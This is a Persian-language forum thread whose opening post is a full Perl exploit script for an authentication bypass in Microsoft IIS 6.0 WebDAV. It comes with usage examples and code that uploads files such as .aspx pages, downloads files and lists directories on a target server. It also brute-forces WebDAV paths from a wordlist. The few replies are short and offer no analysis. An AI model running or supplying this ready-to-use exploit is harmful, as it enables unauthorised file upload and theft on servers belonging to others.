• ¡Welcome to Square Theme!
  • This news are in header template.
  • Please ignore this message.
مهمان عزیز خوش‌آمدید. ورود عضــویت


امتیاز موضوع:
  • 1 رای - 5 میانگین
  • 1
  • 2
  • 3
  • 4
  • 5
Title: MS IIS 6.0 WebDAV Auth. Bypass Exploit v1.1 (perl)
حالت موضوعی
#1
کد:
#!/usr/bin/perl
#  ********* !!! WARNING !!! *********
#  *   FOR SECURITY TESTiNG ONLY!    *
#  ***********************************
#  MS IIS 6.0 WebDAV Auth. Bypass Exploit v1.1
#  v1.1 add brute force dir fuction.
#  v1.0 download、upload and list dir.
#
#  Usage:
#        IIS6_webdav.pl -target -port -method -webdavpath|-BruteForcePath [-file]
#        -target                                eg.: 192.168.1.1
#   -port                                    eg.: 80
#   -method                                eg.: g
#    (p:PUT,g:GET,l:LIST)
#   -webdavpath                        eg.: webdav
#   -BruteForcePath                eg.: brute force webdav path
#   -file    (optional)            eg.: test.aspx
#  Example:
#        put a file:
#                IIS6_webdav.pl -t 192.168.1.1 -p 80 -m p -x webdav -f test.aspx
#        get a file:
#                IIS6_webdav.pl -t 192.168.1.1 -p 80 -m g -x webdav -f test.aspx
#        list dir:
#                IIS6_webdav.pl -t 192.168.1.1 -p 80 -m l -x webdav
#        brute force + list dir:
#                IIS6_webdav.pl -t 192.168.1.1 -p 80 -m l -b dirdic.txt
#        brute force + get file:
#                IIS6_webdav.pl -t 192.168.1.1 -p 80 -m g -b dirdic.txt -f test.aspx
  
use IO::Socket;
use Getopt::Long;

use threads;
use threads::shared;

# Globals Go Here.
my $target;                # Host being probed.
my $port;                    # Webserver port.
my $method;                # HTTP Method, PUT GET or .

my $xpath;                # WebDAV path on Webserver.
my $bpath;                # Bruteforce WebDAV path.
my $file;                    # file name.
my $httpmethod;
my $Host_Header;    # The Host header has to be changed

GetOptions(
        "target=s"      => \$target,
        "port=i"        => \$port,
        "method=s"      => \$method,
        "xpath=s"       => \$xpath,
        "bpath=s"       => \$bpath,
        "file=s"        => \$file,
        "help|?"        => sub {
                                hello();
                                exit(0);
                           }
);

$error .= "Error: You must specify a target host\n" if ((!$target));
$error .= "Error: You must specify a target port\n" if ((!$port));
$error .= "Error: You must specify a put,get or list method\n" if ((!$method));
$error .= "Error: You must specify a webdav path\n" if ((!$xpath) && (!$bpath));
$error .= "Error: You must specify a upload or download file name\n" if ((!$file) && $method != "l");

if ($error) {
        print "Try $0 -help or -?' for more information.\n$error\n" ;
        exit;
}

hello();

if ($method eq "p") {
    $httpmethod = "PUT";
} elsif ($method eq "g") {
  $httpmethod = "GET";
} elsif ($method eq "l") {
  $httpmethod = "PROPFIND";
} else {
  print "$method Method not accept !!!\n";
  exit(0);
}
    
# ************************************
# * We testing WebDAV methods first  *
# ************************************
webdavtest($target,$port);
#end of WebDAV testing.
# ****************************************
# * We try to brute forceing WebDAV path *
# ****************************************
if ($bpath) {
  $xpath = webdavbf($target,$port,$bpath);
}
#end of brute force
print "-" x 60 ."\n";
if ($httpmethod eq "PUT") {
  my $content;
  my $data;
  #cacl file size
  $filesize = -s $file;
  print "$file size is $filesize bytes\n";
  open(INFO, $file) || die("Could not open file!");
  #@lines=<INFO>;
  binmode(INFO); #binary
  while(read(INFO, $data, $filesize))
  {
      $content .= $data;
  }
  close(INFO);
  #print $content;
  
  $Host_Header = "Translate: f\r\nHost: $target\r\nContent-Length: $filesize\r\n";
} elsif ($httpmethod eq "GET") {
    $Host_Header = "Translate: f\r\nHost: $target\r\nConnection: close\r\n\r\n";
} elsif ($httpmethod eq "PROPFIND") {
    $Host_Header = "Host: $target\r\nConnection: close\r\nContent-Type: text/xml; charset=\"utf-8\"\r\nContent-Length: 0\r\n\r\n";
    $Host_Header = $Host_Header."<?xml version=\"1.0\" encoding=\"utf-8\"?><D:propfind xmlns:D=\"DAV:\"><D:prop xmlns:R=\"http://apache.org/dav/props/\"><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></D:propfind>";
}
print "-" x 60 ."\n$httpmethod $file , Please wait ...\n"."-" x 60 ."\n";

# ************************
# * Sending HTTP request *
# ************************
if ($httpmethod eq "PUT") {
  @results=sendraw2("$httpmethod /%c0%af$xpath/$file HTTP/1.0\r\n$Host_Header\r\n$content",$target,$port,10);
  if ($#results < 1){die "10s timeout to $target on port $port\n";}
} elsif ($httpmethod eq "GET") {
    @results=sendraw2("$httpmethod /%c0%af$xpath/$file HTTP/1.0\r\n$Host_Header",$target,$port,10);
  if ($#results < 1){die "10s timeout to $target on port $port\n";}
} elsif ($httpmethod eq "PROPFIND") {
    @results=sendraw2("$httpmethod /%c0%af$xpath/ HTTP/1.0\r\n$Host_Header",$target,$port,10);
  if ($#results < 1){die "10s timeout to $target on port $port\n";}
}
#print @results;
$flag="off";
if ($results[0] =~ m|^HTTP/1\.[01] 2[0-9][0-9] |){
    $flag="on";
} elsif ($results[0] =~ m|^HTTP/1\.[01] 4[0-9][0-9] |){
    $flag="off";
}    

print "-" x 60 ."\n";
if ($flag eq "on") {
  if ($httpmethod eq "PUT") {
      print "$httpmethod $file from [$target:$port/$xpath] OK\r\n";
  } elsif ($httpmethod eq "GET") {
    my $line_no = 0;
    my $counter = @results;
    foreach $line (@results){
        ++$line_no;
        if ($line =~ /^Accept-Ranges: bytes\r\n/){
            last;
        }
    }

    # Write file to disk
    open(OUTFILE, ">$file") or die "Could not write to file: $!\n";
    binmode (OUTFILE);
    print OUTFILE @results[$line_no+1..$counter];
    close(OUTFILE);    
    
      print "$httpmethod $file from [$target:$port/$xpath] OK\r\nPlease check $file on local disk\r\n";      
      
  } elsif ($httpmethod eq "PROPFIND") {
    print "$httpmethod path list from [$target:$port/$xpath] OK\r\n";
      foreach $line (@results){
        if ($line =~ /^\<\?xml version\=/i){
            my @list = split("<a:href>", $line);
            foreach $path (@list) {
                $no = index($path,"<");
                $result.=substr($path, 0, $no)."\n";
            }
            print $result;
            last;
        }
    }
  }
} else {
    print "$httpmethod $file from [$target:$port/$xpath] FAILED!!!\r\n";
}
print "-" x 60 ."\n";
exit(0);

# *************
# * Sendraw-2 *
# *************
sub sendraw2 {
  my ($pstr,$realip,$realport,$timeout)=@_;
  my $target2 = inet_aton($realip);
  my $flagexit=0;
  $SIG{ALRM}=\&ermm;
  socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems");
  alarm($timeout);
  if (connect(S,pack "SnA4x8",2,$realport,$target2)){
    alarm(0);
    my @in;
    select(S); $|=1;
    print $pstr;
    alarm($timeout);
    while(<S>){
      if ($flagexit == 1){
        close (S);
        print STDOUT "Timeout\n";
        return "Timeout";
      }
      push @in, $_;
    }
    alarm(0);
    select(STDOUT);
    close(S);
    return @in;
  } else {return "0";}
}

sub ermm{
        $flagexit=1;
        close (S);
}

sub webdavtest {
    my ($testip,$testport)=@_;
  print "-" x 60 ."\n";
  print "Testing WebDAV methods [$testip $testport]\n";
  print "-" x 60 ."\n";
  @results=sendraw2("OPTIONS / HTTP/1.0\r\n\r\n",$testip,$testport,10);
  if ($#results < 1){die "10s timeout to $target on port $testport\n";}
  #print @results;
  $flag="off";
  foreach $line (@results){
      if ($line =~ /^Server: /){
          ($left,$right)=split(/\:/,$line);
          $right =~ s/ //g;
          print "$target : Server type is : $right";

        if ($right !~ /Microsoft-IIS/i){
            print "$target : Not a Microsoft IIS Server\n";
            exit(0);
        }
      }
    
      if ($line =~ /^DAV: /){
          $flag="on";
      }
    
      if ($line =~ /^Public: / && $flag eq "on"){
        ($left,$right)=split(/\:/,$line);
        $right =~ s/ //g;
        print "$target : Method type is : $right";
        if ($right !~ /$httpmethod/i){
          print "$target : Not allow $httpmethod on this WebDAV Server\n";
          exit(0);
        } else {
          $flag="on";
        }
      }        
  }
  if ($flag eq "off") {
    print "$target : WebDAV disable\n";
    exit(0);    
  }
}

sub webdavbf {
    my ($bfip,$bfport,$bfpath)=@_;
  print "-" x 60 ."\n";
  print "Try to brute forceing WebDAV path ...\n";
  print "-" x 60 ."\n";
  open(BF, $bfpath) || die("Could not open file!");
  foreach $lines (<BF>){
      chomp($lines);

      $Host_Header = "Host: $bfip\r\nConnection: close\r\nContent-Type: text/xml; charset=\"utf-8\"\r\nContent-Length: 0\r\n\r\n";
      $Host_Header = $Host_Header."<?xml version=\"1.0\" encoding=\"utf-8\"?><D:propfind xmlns:D=\"DAV:\"><D:prop xmlns:R=\"http://apache.org/dav/props/\"><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></D:propfind>";
      
      @results=sendraw2("PROPFIND /$lines/ HTTP/1.0\r\n$Host_Header",$bfip,$bfport,10);
    if ($#results < 1){die "10s timeout to $bfip on port $bfport\n";}
    
    print "[$lines]...$results[0]";
    
       #maybe this response
       #HTTP/1.1 207 Multi-Status
    if ($results[0] =~ m|^HTTP/1\.[01] 401 |){
        print "Find out path on [$lines]\n";
        return $lines;
        last;
    }
  }
  close(BF) ;
  print "Sorry... We can not find any more path... :(\n";
  exit(0);
}

sub hello{
  print "\n";
  print "\t ##################################################\n";
  print "\t #    MS IIS 6.0 WebDAV Auth. Bypass Exploit V1.0  #\n";
  print "\t #  **************** !!! WARNING !!! **************#\n";
  print "\t #  **** FOR PRIVATE AND EDUCATIONAL USE ONLY! ****#\n";
  print "\t #  ***********************************************#\n";
  print "\t #  Written by csgcsg 090529                       #\n";
  print "\t ###################################################\n";
  print "\n\t $0 -target -port -method -webdavpath [-file]\n";
  print "\n\t -target\t\t eg.: 192.168.1.1\n";
  print "\t -port\t\t\t eg.: 80\n";
  print "\t -method (p:PUT, g:GET, l:LIST)\t eg.: g\n";
  print "\t -webdavpath|-bruteForcePath\t\t eg.: webdav\n";
  print "\t -file\t\t\t eg.: test.aspx\n\n";
  print "\tUsage eg.: \n\t$0 -t 192.168.1.1 -p 80 -m p -x webdav -f test.aspx\n";
};
گروه دور همی پارسی کدرز
https://t.me/joinchat/GxVRww3ykLynHFsdCvb7eg
 
پاسخ
#2
اینا چی هستند که نوشتی.قاطی کردم....
زندگی شهد گل است زنبور روزگار میمکدش....
 
پاسخ
#3
یه اکسپولیت برای باگ IIS 6.0 WebDAV Auth
گروه دور همی پارسی کدرز
https://t.me/joinchat/GxVRww3ykLynHFsdCvb7eg
 
پاسخ
#4
اقا من توصیه می کنم به خودم که تو خط این چیزا نرم قاطی تر شدم.اصلا چی میگی من نمی فهمم. ممنون دیگه تو این موضوعات نمیام.
زندگی شهد گل است زنبور روزگار میمکدش....
 
پاسخ
#5
(01-26-2012، 09:02 PM)meisam1376 نوشته: اقا من توصیه می کنم به خودم که تو خط این چیزا نرم قاطی تر شدم.اصلا چی میگی من نمی فهمم. ممنون دیگه تو این موضوعات نمیام.

پیشنهاد میکم اینجا رو ببین
http://parsicoders.com/showthread.php?ti...73#pid3473
گروه دور همی پارسی کدرز
https://t.me/joinchat/GxVRww3ykLynHFsdCvb7eg
 
پاسخ
  


موضوعات مشابه ...
موضوع نویسنده پاسخ بازدید آخرین ارسال
  Mozilla Firefox <=12.0 Denial Of Service Exploit nimaarek 2 3,077 05-07-2012، 01:36 PM
آخرین ارسال: MOH3NCODDEr
  Cisco HTTP configuration grabber -- well-known cisco exploit Amin_Mansouri 0 1,972 10-07-2011، 09:41 PM
آخرین ارسال: Amin_Mansouri
  Bypass Windows 7 x86/x64 UAC Fully Patched – Meterpreter Module Amin_Mansouri 1 2,712 04-28-2011، 02:26 PM
آخرین ارسال: Amin_Mansouri

پرش به انجمن:


Browsing: 1 مهمان